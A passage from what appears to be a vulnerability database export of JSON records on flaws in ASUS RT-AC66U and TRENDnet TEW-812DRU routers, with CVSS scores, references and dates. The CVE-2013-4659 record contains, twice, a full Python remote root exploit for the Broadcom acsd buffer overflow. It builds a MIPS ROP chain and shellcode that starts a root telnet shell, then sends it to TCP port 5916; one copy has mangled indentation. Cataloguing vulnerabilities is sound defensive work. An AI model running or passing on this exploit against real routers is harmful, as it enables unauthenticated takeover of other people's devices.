remotos no autenticados mediante el aprovechamiento de CVE-2013-3098." } ], "id": "CVE-2013-3365", "lastModified": "2024-11-21T01:53:29.020", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 8.5, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ] }, "published": "2014-02-04T21:55:05.200", "references": [ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "http://infosec42.blogspot.com/2013/07/exploit-trendnet-tew-812dru-csrfcommand.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "http://securityevaluators.com/content/case-studies/routers/Vulnerability_Catalog.pdf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "http://infosec42.blogspot.com/2013/07/exploit-trendnet-tew-812dru-csrfcommand.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "http://securityevaluators.com/content/case-studies/routers/Vulnerability_Catalog.pdf" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-78" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
var-201703-0032
Vulnerability from variot
Buffer overflow in Broadcom ACSD allows remote attackers to execute arbitrary code via a long string to TCP port 5916. This component is used on routers of multiple vendors including ASUS RT-AC66U and TRENDnet TEW-812DRU. The ASUS RT-AC66U is a dual-band wireless router. ASUS RT-AC66U Broadcom acsd Wireless Channel Service (Wireless Channel Servic) has multiple buffer overflow vulnerabilities that allow remote attackers to exploit a vulnerability to submit a malicious request to stop the device from responding or possibly execute arbitrary code. ASUS RT-AC66U is prone to multiple buffer-overflow vulnerabilities. Failed exploit attempts will likely result in denial-of-service conditions. The former is produced by ASUS, and the latter is produced by TRENDnet in the United States. Broadcom ACSD is one of the wireless channel service components. A buffer overflow vulnerability exists in the Broadcom ACSD component used in the ASUS RT-AC66U and TRENDnet TEW-812DRU. #!/usr/bin/env python
import signal, struct from time import sleep from socket import * from sys import exit, exc_info
Title***ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
Discovered and Reported*June 2013
Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson
*Security Analsyts @ Independent Security Evaluators
Software Vendor***http://asus.com
Exploit/Advisory**http://securityevaluators.com, http://infosec42.blogspot.com/
Software****acsd wireless service (Listens on TCP/5916)
Firmware Version**3.0.0.4.266 (Other versions were not tested and may be vulnerable)
CVE***ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659
Overview:
The ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple
Buffer Overflow attacks.
Multiple overflows exist in the following software:
- Broadcom acsd - Wireless Channel Service (autochannel¶m, autochannel&data, csscan&ifname commands)
def sigHandle(signum, frm): # Signal handler
print "\n[!!!] Cleaning up the exploit... [!!!]\n"
sleep(1)
exit(0)
def targServer():
while True:
try:
server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:\n\n>"))
server = inet_ntoa(server)
break
except:
print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n"
sleep(1)
continue
return server
def main():
print ("""\n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
[] Discovered and Reported: June 2013 [] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE [] Software Vendor: http://asus.com [] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/ [] Software: acsd wireless service (Listens on TCP/5916) [] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable) [*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659\n""") signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c victim = targServer() port = int(5916) acsdCmd = "autochannel¶m=" #Vulnerable command - JH
# base address of .text section of libc.so.0 in acsd's address space
libc_base = 0x2ab25000
# ROP gadget #1
# lui s0,0x2
# li a0,1
# move t9,s1
# jalr t9
# ori a1,s0,0x2
ra1 = struct.pack("<L", libc_base + 0x2d39c)
# ROP gadget #2
# move t9,s3
# lw ra,44(sp)
# lw s4,40(sp)
# lw s3,36(sp)
# lw s2,32(sp)
# lw s1,28(sp)
# lw s0,24(sp)
# jr t9
s1 = struct.pack("<L", libc_base + 0x34358)
# sleep() - used to force program context switch (cache flush)
s3 = struct.pack("<L", libc_base + 0x2cb90)
# ROP gadget #3
# addiu a1,sp,24
# lw gp,16(sp)
# lw ra,32(sp)
# jr ra
# addiu sp,sp,40
ra2 = struct.pack("<L", libc_base + 0xa1b0)
# ROP gadget #4
# move t9,a1
# addiu a0,a0,56
# jr t9
# move a1,a2
ra3 = struct.pack("<L", libc_base + 0x3167c)
# jalr sp
jalr_sp = "\x09\xf8\xa0\x03"
JuNk = "\x42" * 510
safeNop = "2Aa3"
#80 Bytes system() Shellcode by Jacob Holcomb of ISE
#Calling system() and executing telnetd -l /bin/sh
shellcode = "\x6c\x6e\x08\x3c\x74\x65\x08\x35\xec\xff\xa8"
shellcode += "\xaf\x64\x20\x09\x3c\x65\x74\x29\x35\xf0\xff"
shellcode += "\xa9\xaf\x20\x2f\x0a\x3c\x2d\x6c\x4a\x35\xf4"
shellcode += "\xff\xaa\xaf\x6e\x2f\x0b\x3c\x62\x69\x6b\x35"
shellcode += "\xf8\xff\xab\xaf\x73\x68\x0c\x24\xfc\xff\xac"
shellcode += "\xaf\xec\xff\xa4\x23\xec\xff\xbd\x23\xb4\x2a"
shellcode += "\x19\x3c\x50\xf0\x39\x37\x09\xf8\x20\x03\x32"
shellcode += "\x41\x61\x33"
sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48]
sploit += ra2 + JuNk[0:24]+ jalr_sp + safeNop + ra3 + JuNk[0:4]
sploit += safeNop + shellcode
try:
print "\n [*] Creating network socket."
net_sock = socket(AF_INET, SOCK_STREAM)
except:
print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info()
sleep(1)
exit(0)
try:
print " [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d." % (victim, port)
net_sock.connect((victim, port))
except:
print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info())
sleep(1)
exit(0)
try:
print """ [*] Attempting to exploit the acsd param command.
[] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d. [] Payload Length: %d bytes.""" % (victim, port, len(sploit)) net_sock.send(sploit) sleep(1) except: print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info()) sleep(1) exit(0)
try:
print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!
[*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n""" net_sock.close() except: print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info() sleep(1) exit(0)
if name == "main": main()
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "rt-ac66u", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": null }, { "_id": null, "model": "tew-812dru", "scope": "eq", "trust": 1.0, "vendor": "trendnet", "version": null }, { "_id": null, "model": "rt-ac66u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "_id": null, "model": "tew-812dru", "scope": null, "trust": 0.8, "vendor": "trendnet", "version": null }, { "_id": null, "model": "rt-ac66u", "scope": "eq", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.266" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-11043" }, { "db": "JVNDB", "id": "JVNDB-2013-006764" }, { "db": "CNNVD", "id": "CNNVD-201307-627" }, { "db": "NVD", "id": "CVE-2013-4659" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:trendnet:tew-812dru_firmware", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-006764" } ] }, "credits": { "_id": null, "data": "Jacob Holcomb/Gimppy and Jacob Thompson", "sources": [ { "db": "BID", "id": "61499" }, { "db": "CNNVD", "id": "CNNVD-201307-627" } ], "trust": 0.9 }, "cve": "CVE-2013-4659", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2013-4659", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.9, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2013-11043", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-64661", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2013-4659", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2013-4659", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2013-4659", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2013-11043", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201307-627", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-64661", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2013-4659", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-11043" }, { "db": "VULHUB", "id": "VHN-64661" }, { "db": "VULMON", "id": "CVE-2013-4659" }, { "db": "JVNDB", "id": "JVNDB-2013-006764" }, { "db": "CNNVD", "id": "CNNVD-201307-627" }, { "db": "NVD", "id": "CVE-2013-4659" } ] }, "description": { "_id": null, "data": "Buffer overflow in Broadcom ACSD allows remote attackers to execute arbitrary code via a long string to TCP port 5916. This component is used on routers of multiple vendors including ASUS RT-AC66U and TRENDnet TEW-812DRU. The ASUS RT-AC66U is a dual-band wireless router. ASUS RT-AC66U Broadcom acsd Wireless Channel Service (Wireless Channel Servic) has multiple buffer overflow vulnerabilities that allow remote attackers to exploit a vulnerability to submit a malicious request to stop the device from responding or possibly execute arbitrary code. ASUS RT-AC66U is prone to multiple buffer-overflow vulnerabilities. Failed exploit attempts will likely result in denial-of-service conditions. The former is produced by ASUS, and the latter is produced by TRENDnet in the United States. Broadcom ACSD is one of the wireless channel service components. A buffer overflow vulnerability exists in the Broadcom ACSD component used in the ASUS RT-AC66U and TRENDnet TEW-812DRU. #!/usr/bin/env python\n\nimport signal, struct\nfrom time import sleep\nfrom socket import *\nfrom sys import exit, exc_info\n\n#\n# Title*******************ASUS RT-AC66U Remote Root Shell Exploit - acsd param command\n# Discovered and Reported*June 2013 \n# Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson\n# *Security Analsyts @ Independent Security Evaluators\n# Software Vendor*********http://asus.com\n# Exploit/Advisory********http://securityevaluators.com, http://infosec42.blogspot.com/\n# Software****************acsd wireless service (Listens on TCP/5916)\n# Firmware Version********3.0.0.4.266 (Other versions were not tested and may be vulnerable) \n# CVE*********************ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659\n#\n# Overview:\n#\tThe ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple \n# Buffer Overflow attacks. \n#\n# Multiple overflows exist in the following software:\n#\n#\t- Broadcom acsd - Wireless Channel Service (autochannel\u0026param, autochannel\u0026data, csscan\u0026ifname commands)\n#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\n\ndef sigHandle(signum, frm): # Signal handler\n \n print \"\\n[!!!] Cleaning up the exploit... [!!!]\\n\"\n sleep(1)\n exit(0)\n\n\ndef targServer():\n \n while True: \n try:\n server = inet_aton(raw_input(\"\\n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:\\n\\n\u003e\"))\n server = inet_ntoa(server)\n break\n except:\n print \"\\n\\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\\n\\n\"\n sleep(1)\n continue\n \n return server \n\n\ndef main():\n \n print (\"\"\"\\n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command\n [*] Discovered and Reported: June 2013\n [*] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE\n [*] Software Vendor: http://asus.com\n [*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/\n [*] Software: acsd wireless service (Listens on TCP/5916)\n [*] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable)\n [*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659\\n\"\"\")\n signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c\n victim = targServer()\n port = int(5916)\n acsdCmd = \"autochannel\u0026param=\" #Vulnerable command - JH\n \n # base address of .text section of libc.so.0 in acsd\u0027s address space\n libc_base = 0x2ab25000\n\n # ROP gadget #1\n # lui s0,0x2\n # li a0,1\n # move t9,s1\n # jalr t9\n # ori a1,s0,0x2\n ra1 = struct.pack(\"\u003cL\", libc_base + 0x2d39c)\n\n # ROP gadget #2\n # move t9,s3\n # lw ra,44(sp)\n # lw s4,40(sp)\n # lw s3,36(sp)\n # lw s2,32(sp)\n # lw s1,28(sp)\n # lw s0,24(sp)\n # jr t9\n s1 = struct.pack(\"\u003cL\", libc_base + 0x34358)\n\n # sleep() - used to force program context switch (cache flush)\n s3 = struct.pack(\"\u003cL\", libc_base + 0x2cb90)\n\n # ROP gadget #3\n # addiu a1,sp,24\n # lw gp,16(sp)\n # lw ra,32(sp)\n # jr ra\n # addiu sp,sp,40\n ra2 = struct.pack(\"\u003cL\", libc_base + 0xa1b0)\n\n # ROP gadget #4\n # move t9,a1\n # addiu a0,a0,56\n # jr t9\n # move a1,a2\n ra3 = struct.pack(\"\u003cL\", libc_base + 0x3167c)\n\n # jalr sp\n jalr_sp = \"\\x09\\xf8\\xa0\\x03\"\n \n JuNk = \"\\x42\" * 510\n safeNop = \"2Aa3\"\n\n #80 Bytes system() Shellcode by Jacob Holcomb of ISE\n #Calling system() and executing telnetd -l /bin/sh\n shellcode = \"\\x6c\\x6e\\x08\\x3c\\x74\\x65\\x08\\x35\\xec\\xff\\xa8\"\n shellcode += \"\\xaf\\x64\\x20\\x09\\x3c\\x65\\x74\\x29\\x35\\xf0\\xff\"\n shellcode += \"\\xa9\\xaf\\x20\\x2f\\x0a\\x3c\\x2d\\x6c\\x4a\\x35\\xf4\"\n shellcode += \"\\xff\\xaa\\xaf\\x6e\\x2f\\x0b\\x3c\\x62\\x69\\x6b\\x35\"\n shellcode += \"\\xf8\\xff\\xab\\xaf\\x73\\x68\\x0c\\x24\\xfc\\xff\\xac\"\n shellcode += \"\\xaf\\xec\\xff\\xa4\\x23\\xec\\xff\\xbd\\x23\\xb4\\x2a\"\n shellcode += \"\\x19\\x3c\\x50\\xf0\\x39\\x37\\x09\\xf8\\x20\\x03\\x32\"\n shellcode += \"\\x41\\x61\\x33\"\n\n sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48]\n sploit += ra2 + JuNk[0:24]+ jalr_sp + safeNop + ra3 + JuNk[0:4]\n sploit += safeNop + shellcode\n\n try:\n print \"\\n [*] Creating network socket.\"\n net_sock = socket(AF_INET, SOCK_STREAM)\n except:\n print \"\\n [!!!] There was an error creating the network socket. [!!!]\\n\\n%s\\n\" % exc_info() \n sleep(1)\n exit(0) \n\n try:\n print \" [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d.\" % (victim, port)\n net_sock.connect((victim, port))\n except:\n print \"\\n [!!!] There was an error connecting to %s. [!!!]\\n\\n%s\\n\" % (victim, exc_info())\n sleep(1)\n exit(0)\n \n try:\n print \"\"\" [*] Attempting to exploit the acsd param command. \n [*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d. \n [*] Payload Length: %d bytes.\"\"\" % (victim, port, len(sploit))\n net_sock.send(sploit)\n sleep(1)\n except:\n print \"\\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\\n\\n%s\\n\" % (victim, exc_info())\n sleep(1)\n exit(0)\n\n try:\n print \"\"\" [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!\n [*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\\n\"\"\"\n net_sock.close()\n except:\n print \"\\n [!!!] There was an error closing the network socket. [!!!]\\n\\n%s\\n\" % exc_info()\n sleep(1)\n exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n", "sources": [ { "db": "NVD", "id": "CVE-2013-4659" }, { "db": "JVNDB", "id": "JVNDB-2013-006764" }, { "db": "CNVD", "id": "CNVD-2013-11043" }, { "db": "BID", "id": "61499" }, { "db": "VULHUB", "id": "VHN-64661" }, { "db": "VULMON", "id": "CVE-2013-4659" }, { "db": "PACKETSTORM", "id": "122562" } ], "trust": 2.7 }, "exploit_availability": { "_id": null, "data": [ { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=27133", "trust": 0.2, "type": "exploit" }, { "reference": "https://www.scap.org.cn/vuln/vhn-64661", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-64661" }, { "db": "VULMON", "id": "CVE-2013-4659" } ] }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2013-4659", "trust": 3.6 }, { "db": "PACKETSTORM", "id": "122562", "trust": 2.7 }, { "db": "BID", "id": "61499", "trust": 1.6 }, { "db": "JVNDB", "id": "JVNDB-2013-006764", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201307-627", "trust": 0.7 }, { "db": "CNVD", "id": "CNVD-2013-11043", "trust": 0.6 }, { "db": "NSFOCUS", "id": "24219", "trust": 0.6 }, { "db": "EXPLOIT-DB", "id": "27133", "trust": 0.2 }, { "db": "SEEBUG", "id": "SSVID-80751", "trust": 0.1 }, { "db": "SEEBUG", "id": "SSVID-80752", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-64661", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2013-4659", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-11043" }, { "db": "VULHUB", "id": "VHN-64661" }, { "db": "VULMON", "id": "CVE-2013-4659" }, { "db": "BID", "id": "61499" }, { "db": "JVNDB", "id": "JVNDB-2013-006764" }, { "db": "PACKETSTORM", "id": "122562" }, { "db": "CNNVD", "id": "CNNVD-201307-627" }, { "db": "NVD", "id": "CVE-2013-4659" } ] }, "id": "VAR-201703-0032", "iot": { "_id": null, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2013-11043" }, { "db": "VULHUB", "id": "VHN-64661" } ], "trust": 1.1829994849999999 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-11043" } ] }, "last_update_date": "2024-11-23T22:01:14.484000Z", "patch": { "_id": null, "data": [ { "title": "Top Page", "trust": 0.8, "url": "https://www.asus.com/jp/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.trendnet.com/home" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-006764" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-64661" }, { "db": "JVNDB", "id": "JVNDB-2013-006764" }, { "db": "NVD", "id": "CVE-2013-4659" } ] }, "references": { "_id": null, "data": [ { "trust": 2.6, "url": "http://www.linux-magazine.com/issues/2014/161/security-and-soho-routers" }, { "trust": 2.6, "url": "https://packetstormsecurity.com/files/122562/asus-rt-ac66u-acsd-remote-root-buffer-overflow.html" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4659" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4659" }, { "trust": 0.6, "url": "http://1337day.com/exploit/21033" }, { "trust": 0.6, "url": "http://www.securityfocus.com/bid/61499" }, { "trust": 0.6, "url": "http://www.nsfocus.net/vulndb/24219" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=33445" }, { "trust": 0.1, "url": "https://www.exploit-db.com/exploits/27133/" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "http://asus.com" }, { "trust": 0.1, "url": "http://securityevaluators.com," }, { "trust": 0.1, "url": "http://infosec42.blogspot.com/" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-11043" }, { "db": "VULHUB", "id": "VHN-64661" }, { "db": "VULMON", "id": "CVE-2013-4659" }, { "db": "JVNDB", "id": "JVNDB-2013-006764" }, { "db": "PACKETSTORM", "id": "122562" }, { "db": "CNNVD", "id": "CNNVD-201307-627" }, { "db": "NVD", "id": "CVE-2013-4659" } ] }, "sources": { "_id": null, "data": [ { "db": "CNVD", "id": "CNVD-2013-11043", "ident": null }, { "db": "VULHUB", "id": "VHN-64661", "ident": null }, { "db": "VULMON", "id": "CVE-2013-4659", "ident": null }, { "db": "BID", "id": "61499", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2013-006764", "ident": null }, { "db": "PACKETSTORM", "id": "122562", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201307-627", "ident": null }, { "db": "NVD", "id": "CVE-2013-4659", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2013-08-01T00:00:00", "db": "CNVD", "id": "CNVD-2013-11043", "ident": null }, { "date": "2017-03-14T00:00:00", "db": "VULHUB", "id": "VHN-64661", "ident": null }, { "date": "2017-03-14T00:00:00", "db": "VULMON", "id": "CVE-2013-4659", "ident": null }, { "date": "2013-07-29T00:00:00", "db": "BID", "id": "61499", "ident": null }, { "date": "2017-04-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-006764", "ident": null }, { "date": "2013-07-26T20:22:22", "db": "PACKETSTORM", "id": "122562", "ident": null }, { "date": "2013-07-29T00:00:00", "db": "CNNVD", "id": "CNNVD-201307-627", "ident": null }, { "date": "2017-03-14T09:59:00.160000", "db": "NVD", "id": "CVE-2013-4659", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2013-08-01T00:00:00", "db": "CNVD", "id": "CNVD-2013-11043", "ident": null }, { "date": "2017-03-15T00:00:00", "db": "VULHUB", "id": "VHN-64661", "ident": null }, { "date": "2017-03-15T00:00:00", "db": "VULMON", "id": "CVE-2013-4659", "ident": null }, { "date": "2013-07-31T12:25:00", "db": "BID", "id": "61499", "ident": null }, { "date": "2017-04-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-006764", "ident": null }, { "date": "2017-03-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201307-627", "ident": null }, { "date": "2024-11-21T01:56:00.523000", "db": "NVD", "id": "CVE-2013-4659", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "122562" }, { "db": "CNNVD", "id": "CNNVD-201307-627" } ], "trust": 0.7 }, "title": { "_id": null, "data": "ASUS RT-AC66U and TRENDnet TEW-812DRU Used by multiple vendor routers including Broadcom ACSD Vulnerable to buffer overflow", "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-006764" } ], "trust": 0.8 }, "type": { "_id": null, "data": "buffer overflow", "sources": [ { "db": "CNNVD", "id": "CNNVD-201307-627" } ], "trust": 0.6 } }
var-201402-0099
Vulnerability from variot
Multiple cross-site request forgery (CSRF) vulnerabilities in TRENDnet TEW-812DRU router with firmware before 1.0.9.0 allow remote attackers to hijack the authentication of administrators for requests that (1) change admin credentials in a request to setSysAdm.cgi, (2) enable remote management or (3) enable port forwarding in an Apply action to uapply.cgi, or (4) have unspecified impact via a request to setNTP.cgi. NOTE: some of these details are obtained from third party information. The Trendnet TEW-812DRU is a dual-band Gigabit router device. Trendnet TEW-812DRU is prone to a cross-site request-forgery vulnerability. Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device. A cross-site request forgery vulnerability exists in the TRENDnet TEW-812DRU router with firmware version 1.0.8.0
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201402-0099", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "tew-812dru", "scope": "eq", "trust": 1.6, "vendor": "trendnet", "version": "1.0.8.0" }, { "model": "tew-812dru", "scope": null, "trust": 1.4, "vendor": "trendnet", "version": null }, { "model": "tew-812dru", "scope": "eq", "trust": 1.0, "vendor": "trendnet", "version": null }, { "model": "tew-812dru", "scope": "lt", "trust": 0.8, "vendor": "trendnet", "version": "1.0.9.0" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-11063" }, { "db": "JVNDB", "id": "JVNDB-2013-005988" }, { "db": "CNNVD", "id": "CNNVD-201307-631" }, { "db": "NVD", "id": "CVE-2013-3098" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/h:trendnet:tew-812dru", "vulnerable": true }, { "cpe22Uri": "cpe:/o:trendnet:tew-812dru_firmware", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-005988" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Jacob Holcomb", "sources": [ { "db": "BID", "id": "61490" }, { "db": "CNNVD", "id": "CNNVD-201307-631" } ], "trust": 0.9 }, "cve": "CVE-2013-3098", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": 